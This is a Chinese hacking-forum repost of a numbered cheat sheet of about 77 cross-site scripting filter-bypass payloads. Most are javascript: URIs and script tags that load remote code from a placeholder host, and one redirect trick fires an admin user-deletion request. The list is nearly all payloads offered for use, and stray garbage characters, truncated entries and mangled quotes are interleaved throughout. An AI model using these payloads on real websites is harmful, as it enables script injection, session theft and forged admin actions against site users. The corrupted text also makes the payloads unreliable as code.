貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
9 x% N. a: G t2 T8 F(1)普通的XSS JavaScript注入" C2 {8 Z& S+ c% Q0 T0 K+ O0 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! v- ]' C5 c8 v; |(2)IMG标签XSS使用JavaScript命令 Q: t x. [2 ~3 F3 ~+ |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: e- Y0 Q n$ K7 ^7 [7 g2 P9 H; y7 M% c
(3)IMG标签无分号无引号
H* t5 m0 r6 v5 z$ a" {<IMG SRC=javascript:alert(‘XSS’)>
/ ^* i& \8 j9 g) [(4)IMG标签大小写不敏感0 S9 z4 d( L$ Z! J- ?3 O% a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* _( P( n" L5 }* K+ @3 b(5)HTML编码(必须有分号)/ k* J2 q4 T2 x8 x) Z
<IMG SRC=javascript:alert(“XSS”)>6 I5 x T) _4 e: j& g/ _
(6)修正缺陷IMG标签3 l# @3 ^: s1 A
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' c5 P1 g% ?5 v& q, o1 g
7 ?, d" ]4 @: r1 e/ Y& p/ N6 t+ D
8 I+ u: g! v ?2 H( z' l# p(7)formCharCode标签(计算器)
+ h& p& Y" D; B- M1 C* F<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 ^1 T. P9 z9 X' P
(8)UTF-8的Unicode编码(计算器)7 t' e8 s0 u5 D. {1 Q" E
<IMG SRC=jav..省略..S')>- V" v2 l8 T: }6 }& `* P
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 j: u5 B7 b+ n& Z" g<IMG SRC=jav..省略..S')>
4 L. ?: w( z, L6 H(10)十六进制编码也是没有分号(计算器)6 n) o1 p& ?- _+ x F) }
<IMG SRC=java..省略..XSS')>
a2 c% L7 o' K4 N) P(11)嵌入式标签,将Javascript分开2 V" \! R/ z6 Q5 Y& b% ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 d0 K7 x. K( P* L z+ u+ X5 I
(12)嵌入式编码标签,将Javascript分开0 O: ~. @ j( \
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 U. _; M+ d t' `(13)嵌入式换行符- @: Q! G6 h4 B" r7 Z8 W6 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ S5 [3 `$ s9 a(14)嵌入式回车
- g+ y7 l3 W6 U/ P+ ?( ~7 a( \<IMG SRC=”jav ascript:alert(‘XSS’);”>
. Y/ A& l4 \' C4 W+ p(15)嵌入式多行注入JavaScript,这是XSS极端的例子( C. C, Q5 S# B j8 z$ |
<IMG SRC=”javascript:alert(‘XSS‘)”>
' R# ]' U- q' T" G ?5 P2 L7 w( K" L(16)解决限制字符(要求同页面)
8 d9 W- P6 u7 o' d. L" Q$ V5 {<script>z=’document.’</script>
' p+ Z$ I% c8 A# O<script>z=z+’write(“‘</script>4 T) s% w% j$ g) T
<script>z=z+’<script’</script>; O3 d* N G& }
<script>z=z+’ src=ht’</script>
1 M& F) u; o$ X# P<script>z=z+’tp://ww’</script>4 J [/ C u+ n& K* q
<script>z=z+’w.shell’</script>7 q/ x7 Q% y4 m; T$ f8 t) e
<script>z=z+’.net/1.’</script>
" [" ?5 v. ^; Y. R: p' |<script>z=z+’js></sc’</script>
$ I% n" w+ H/ f4 C- }<script>z=z+’ript>”)’</script>
4 d5 u. u; t; M<script>eval_r(z)</script>' d9 {1 B& A& K
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
& d, @5 B# X% q/ y$ b' m3 T2 Jhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
4 L* r8 k% G- Hperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
0 b5 c+ I, Y7 T Y7 v, m( S8 _) v(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) e) A ~ D! {9 \5 I( q% v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: B4 G# G3 Q+ q- l
(19)Spaces和meta前的IMG标签
B2 n& u& S3 w3 P, _2 p<IMG SRC=” javascript:alert(‘XSS’);”>
: c) @+ [& i4 a1 H(20)Non-alpha-non-digit XSS4 Y( y. D0 @3 U0 N4 R, d: ]. Z1 B
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- Z) V: j5 f! E# z* v8 ^
(21)Non-alpha-non-digit XSS to 2
2 g% z$ p6 {, W9 Q4 M<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ u+ B) v3 n# a I; q(22)Non-alpha-non-digit XSS to 3; Y4 }* V) p1 p& p! A/ m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 f, t- H# a: [) }7 c6 Q. |(23)双开括号
; \$ ?5 V7 z8 A! `<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, R$ D/ P6 x# [# b(24)无结束脚本标记(仅火狐等浏览器)
) t, A3 D5 S) t0 x2 J/ B3 E+ |<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ }! R) N; `1 {& ?7 R
(25)无结束脚本标记21 Y, T% A' Z; F5 v
<SCRIPT SRC=//3w.org/XSS/xss.js>+ @3 p N2 O+ y, m
(26)半开的HTML/JavaScript XSS; P" }" B1 C0 \4 ~1 u
<IMG SRC=”javascript:alert(‘XSS’)”
3 |- D4 B8 N( H1 c5 I/ p(27)双开角括号
$ A5 c( I7 H! y1 r9 Z a$ {<iframe src=http://3w.org/XSS.html <
4 u$ L# Z% m3 M: d) @2 Q, U8 U(28)无单引号 双引号 分号$ b+ N9 k" U( W' J Y
<SCRIPT>a=/XSS/7 l3 m) k* Y! r0 ]' m
alert(a.source)</SCRIPT>
6 w5 x) L4 l* f* [. N(29)换码过滤的JavaScript: N9 q5 L3 L& Y6 U8 K$ R- x1 G
\”;alert(‘XSS’);//
/ C) P& c% {) R( U(30)结束Title标签
9 W' T" G _# ]. B. @</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>$ m$ K5 n" N' Y
(31)Input Image( K A, c* R' F9 L
<INPUT SRC=”javascript:alert(‘XSS’);”>* D* r9 A3 D. J, g6 L; a
(32)BODY Image' V) v# d: g3 J4 ?5 E$ R4 P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”> Y/ T) V; ]: H" D b6 U* |* O
(33)BODY标签3 n, V& B0 Y& J; M& y
<BODY(‘XSS’)>6 J/ z! \) }- c6 Q
(34)IMG Dynsrc
/ @& [. x5 p6 Z/ T<IMG DYNSRC=”javascript:alert(‘XSS’)”>- p; z0 K: y7 w; I
(35)IMG Lowsrc& S$ X6 p8 _3 O
<IMG LOWSRC=”javascript:alert(‘XSS’)”>; @1 q9 h7 | K% g. I+ T9 U
(36)BGSOUND& f5 k! v: U4 E1 C4 ~0 |9 @$ F- C
<BGSOUND SRC=”javascript:alert(‘XSS’);”> ]5 C9 m2 S7 a' b
(37)STYLE sheet/ U' B: L' b, Y1 S0 S9 B) ~3 B. i
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! S2 u0 l; C7 i2 V( |' C
(38)远程样式表, n" b1 Y" J7 n. T$ Y: Y# V. o
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> l3 @: b* j$ |+ U; D
(39)List-style-image(列表式)- x0 R+ e* F" t0 X) E$ K9 d
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: S; ~, h0 k0 _* r
(40)IMG VBscript
+ b( F$ N! k' E( N ^<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 ?# ?: W7 s5 X
(41)META链接url
# y& @. {" ]4 `3 r( g ? A" }3 E; s
3 t% K# t1 b+ m# }7 ] W<META HTTP-EQUIV=”refresh” CONTENT=”0;( w0 z1 L& K8 g7 |% _4 G, p
URL=http://;URL=javascript:alert(‘XSS’);”>
9 s; t! S. [+ r5 x; C% P! Y9 c7 U(42)Iframe, T$ d L, v5 u
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- e5 l G* U: t$ S- w(43)Frame
/ z4 }) @; n/ v- X+ ]% F<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board L0 e( _1 u1 z; v0 m7 O
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
0 g$ e( W3 P3 S- e) E1 k1 P(44)Table
( p) R3 {8 e: X) `1 W* e: p& W<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* G( \+ V0 j/ l( \
(45)TD6 Z2 k ~* _3 |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
y* Q' g2 H/ B8 _! ?" s1 ?2 b2 p(46)DIV background-image0 ~1 R0 C: k9 b5 h* ^4 _* H
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) w1 Q" \- \/ a: M9 q) q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
# u5 T1 p6 C/ o; T# ~8&13&12288&65279)( ~" w: s$ J. d, G
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 u) Y G7 s4 Q W(48)DIV expression, U6 G6 T5 k9 D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, [# I/ f" w n: [(49)STYLE属性分拆表达
& y6 v x* I6 t' \; x4 F<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* K6 i8 a [, T, A3 C# k( i
(50)匿名STYLE(组成:开角号和一个字母开头)
( S/ {: W3 P: e1 [# I! G* z<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% P. x0 j% P# c- _2 B+ t0 M
(51)STYLE background-image
6 I7 {3 n9 z0 W: E: ^<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A6 X$ J: I+ m$ D) W, E2 F5 a- Q- y% y
CLASS=XSS></A>' g; a8 o$ Q' ]7 ^+ B4 c# a
(52)IMG STYLE方式" o# s' h' L, H4 f# ^1 B2 W% C
exppression(alert(“XSS”))’>' z, T+ V5 Y0 ~1 p
(53)STYLE background: P: ? j4 ?- I8 |3 x' r+ J
<STYLE><STYLE6 V- e( e8 L$ R$ a8 ~3 |2 n
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>8 Y' u5 @4 X8 N0 T# j* U
(54)BASE
( H! z9 S& a( j% Z* `2 G3 C' m<BASE HREF=”javascript:alert(‘XSS’);//”>
. J) }! |* I' @1 s+ W' s(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, b1 z( g& ]/ N, A& Z<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
. _0 N. G6 ?& {; [, y(56)在flash中使用ActionScrpt可以混进你XSS的代码9 Z/ h4 r0 ]# h! h! c5 `
a=”get”;6 [+ X; |% \% @4 H& p) y
b=”URL(\”";) n' O' n# z' z7 O/ ]1 y+ y6 |
c=”javascript:”;
6 _& O( s% A; v' n" X8 l& ^; qd=”alert(‘XSS’);\”)”;
& m8 y" Z! c$ e/ _8 n6 H( O+ Neval_r(a+b+c+d);0 Q/ I3 ^/ r% r O! a
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" s. D2 u4 `8 L; M% l) D' M<HTML xmlns:xss>
3 O- o: f1 B' z2 p- r<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 m- J$ }# o% _- }# |; V& L! v
<xss:xss>XSS</xss:xss>
& j9 D4 \; L8 s# j1 ~</HTML>
. k. Q. c0 w4 O c(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 |( O( B5 J2 q7 i, z* X: @<SCRIPT SRC=””></SCRIPT>9 o9 R6 W* f4 E8 Y7 D" o
(59)IMG嵌入式命令,可执行任意命令
% p2 u( s' p; I2 U5 R* x6 j<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" l" {5 J9 p5 D/ I* L) Q(60)IMG嵌入式命令(a.jpg在同服务器)
{. z2 Q( {* g4 hRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( o- [+ K! i" c9 V+ a) B& P
(61)绕符号过滤! Z) g) a* G2 Q& Y9 g
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- r, i+ }3 j6 ~& ~, H" o7 w(62)9 w7 G; A- n# S1 s% E
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* l* [; a( m4 ^" I3 L1 M3 H
(63)! c% o; W7 g8 G7 q4 K- `5 _
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>: o8 [2 E4 g8 D$ X* h0 g
(64)
4 d! @& T: r( {7 d" s9 A0 u<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 k$ R- p u9 A6 i+ d; f(65)
+ u5 n& Z2 y* Q7 o$ u<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" O5 s0 _4 S( V2 T
(66)12-7-1 T00LS - Powered by Discuz! Board
9 [$ D7 w/ H2 Y6 q3 A( H: lhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
! z6 ~9 Q6 }4 k* ?3 Y5 N% T<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 q( l% b0 p! T" @( F: ^' Y
(67)
1 \) B8 G$ F$ R& p+ Y6 r, W<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>' {7 u! j6 F1 d
</SCRIPT>
/ F. M6 p2 \7 E" K8 e- N6 n3 p(68)URL绕行
5 W4 ^" Q& N) Q/ p/ c<A HREF=”http://127.0.0.1/”>XSS</A>
* K1 ~' F; l C% q(69)URL编码
" S0 S& ]( H4 I( B$ m" G, A4 t0 m<A HREF=”http://3w.org”>XSS</A>, _/ A' o* u6 d5 l' y) t; `0 u7 w
(70)IP十进制5 [, L' }+ @$ C+ k
<A HREF=”http://3232235521″>XSS</A>
( _$ a3 { G- C: n( f& z8 u7 W(71)IP十六进制( \" X! D6 Q4 r" |/ m0 r
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
. ]3 o" R9 _. [$ D. q(72)IP八进制
! p8 ]4 n9 S5 E: ]8 |+ k n<A HREF=”http://0300.0250.0000.0001″>XSS</A>3 n$ f3 N. h* D2 u
(73)混合编码% Y% x5 z- }2 u9 d
<A HREF=”h
, `1 s" C8 V3 D2 W" o. w, {tt p://6 6.000146.0×7.147/”">XSS</A>
& G( K) J$ u7 U$ P( X F- U4 ?(74)节省[http:]
: M8 c$ T0 s' d! w' k- a3 `- s<A HREF=”//www.google.com/”>XSS</A>
& q7 G( p! O" [* ]$ g% b6 G! o(75)节省[www]% ]6 g/ Q( R$ i& [1 d' S
<A HREF=”http://google.com/”>XSS</A> o/ r1 b8 D& r: I5 O g7 N
(76)绝对点绝对DNS( J- P1 U6 g8 {- ?+ j! `
<A HREF=”http://www.google.com./”>XSS</A>3 p F1 x& _3 w, A
(77)javascript链接
$ |! a3 ~2 [; e<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- {- f5 I6 k1 T5 u. |+ r
/ I: ^0 g. l9 o! R原文地址:http://fuzzexp.org/u/0day/?p=14
6 W% B! E8 u7 a1 P6 m- d, @ v9 } w- f5 M
|
发表于 2013-4-19 19:22:37
收藏
支持
反对